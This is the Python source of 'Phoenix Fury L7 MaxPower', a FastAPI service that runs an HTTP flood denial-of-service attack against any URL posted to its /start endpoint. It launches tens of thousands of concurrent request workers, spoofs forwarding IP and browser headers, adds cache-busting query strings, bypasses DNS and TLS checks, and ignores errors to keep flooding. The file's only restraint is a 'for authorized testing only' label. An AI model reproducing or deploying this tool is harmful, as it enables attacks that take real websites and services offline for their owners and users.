import asyncio import random import socket import ssl import time import psutil from typing import Dict from fastapi import FastAPI, HTTPException from pydantic import BaseModel, Field import aiohttp from aiohttp import ClientTimeout, TCPConnector # Try to use uvloop for massive performance gain try: import uvloop asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) except ImportError: pass app = FastAPI( title="🔥 Phoenix Fury L7 MaxPower", description="AUTOMATED MAX-POWER HTTP FLOODER — FOR AUTHORIZED TESTING ONLY", version="7.0" ) # ====================== # CONFIG (HARD-CODED FOR MAX POWER) # ====================== CPU_CORES = psutil.cpu_count(logical=True) or 8 TOTAL_CONCURRENCY = CPU_CORES * 4096 # ~32k tasks on 8-core REQUEST_TIMEOUT = 3 # Aggressive timeout for max turnover BATCH_SIZE = 10_000 # Update stats every 10k requests # Spoofing data USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" ] REFERERS = [ "https://www.google.com/", "https://www.bing.com/", "https://www.facebook.com/", "https://www.twitter.com/" ] def spoof_headers() -> Dict[str, str]: ip = f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}" return { "User-Agent": random.choice(USER_AGENTS), "Referer": random.choice(REFERERS), "X-Forwarded-For": ip, "X-Real-IP": ip, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", "Cache-Control": "max-age=0" } # ====================== # GLOBAL STATE # ====================== class AttackState: def __init__(self): self.active = False self.target = "" self.start_time = 0 self.total_requests = 0 self.current_rps = 0 self.last_count = 0 self.last_time = time.time() STATE = AttackState() # ====================== # WORKER COROUTINE (MAX SPEED) # ====================== async def flood_worker(url: str, session: aiohttp.ClientSession): local_count = 0 while STATE.active: try: # Add random cache-buster target_url = f"{url}?_={random.randint(1000000, 999999999)}" async with session.get(target_url, headers=spoof_headers(), timeout=REQUEST_TIMEOUT): pass # Don't wait for body; just send & forget except: pass # Ignore all errors — keep flooding local_count += 1 if local_count >= BATCH_SIZE: STATE.total_requests += local_count local_count = 0 if local_count > 0: STATE.total_requests += local_count # ====================== # RPS CALCULATOR # ====================== async def rps_monitor(): while STATE.active: await asyncio.sleep(1) now = time.time() elapsed = now - STATE.last_time if elapsed > 0: current = STATE.total_requests STATE.current_rps = (current - STATE.last_count) / elapsed STATE.last_count = current STATE.last_time = now # ====================== # ATTACK LAUNCHER # ====================== @app.post("/start") async def start_attack(target: str = Field(..., description="Full URL: http://target.com or https://target.com")): if STATE.active: raise HTTPException(409, "Attack already running") if not target.startswith(("http://", "https://")): raise HTTPException(400, "Target must start with http:// or https://") # Resolve to IP to avoid DNS lookup per request try: hostname = target.split("://")[1].split("/")[0].split(":")[0] ip = socket.gethostbyname(hostname) # Reconstruct URL with IP to bypass DNS protocol = "https" if target.startswith("https") else "http" port_part = ":" + target.split("://")[1].split("/")[0].split(":")[1] if ":" in target.split("://")[1].split("/")[0] else "" resolved_url = f"{protocol}://{ip}{port_part}/" except Exception as e: raise HTTPException(400, f"Failed to resolve target: {e}") STATE.active = True STATE.target = target STATE.start_time = time.time() STATE.total_requests = 0 STATE.current_rps = 0 STATE.last_count = 0 STATE.last_time = time.time() print(f"🚀 MAX-POWER L7 FLOOD STARTED on {target} (resolved to {ip})") print(f" Concurrency: {TOTAL_CONCURRENCY} | Timeout: {REQUEST_TIMEOUT}s") # Configure session ssl_ctx = ssl.create_default_context() ssl_ctx.check_hostname = False ssl_ctx.verify_mode = ssl.CERT_NONE connector = TCPConnector( limit=0, # No limit on connections limit_per_host=0, force_close=True, keepalive_timeout=0, enable_cleanup_closed=True ) timeout = ClientTimeout(total=REQUEST_TIMEOUT, connect=1, sock_read=2) async def run_flood(): async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session: tasks = [flood_worker(resolved_url, session) for _ in range(TOTAL_CONCURRENCY)] await asyncio.gather(*tasks, return_exceptions=True) # Launch flood + monitor in background asyncio.create_task(run_flood()) asyncio.create_task(rps_monitor()) return {"status": "started", "target": target, "concurrency": TOTAL_CONCURRENCY} @app.post("/stop") async def stop_attack(): if not STATE.active: return {"status": "idle"} STATE.active = False elapsed = time.time() - STATE.start_time avg_rps = STATE.total_requests / elapsed if elapsed > 0 else 0 print(f"✅ ATTACK STOPPED | Total: {STATE.total_requests:,} | Avg RPS: {avg_rps:,.0f}") return { "status": "stopped", "total_requests": STATE.total_requests, "elapsed_sec": round(elapsed, 2), "avg_rps": round(avg_rps, 2) } @app.get("/status") async def get_status(): elapsed = time.time() - STATE.start_time if STATE.active else 0 return { "active": STATE.active, "target": STATE.target, "elapsed_sec": round(elapsed, 2), "total_requests": STATE.total_requests, "current_rps": round(STATE.current_rps, 2), "cpu_percent": psutil.cpu_percent(), "memory_percent": psutil.virtual_memory().percent } @app.get("/") async def root(): return {"message": "🔥 Phoenix Fury L7 MaxPower — /start to begin"}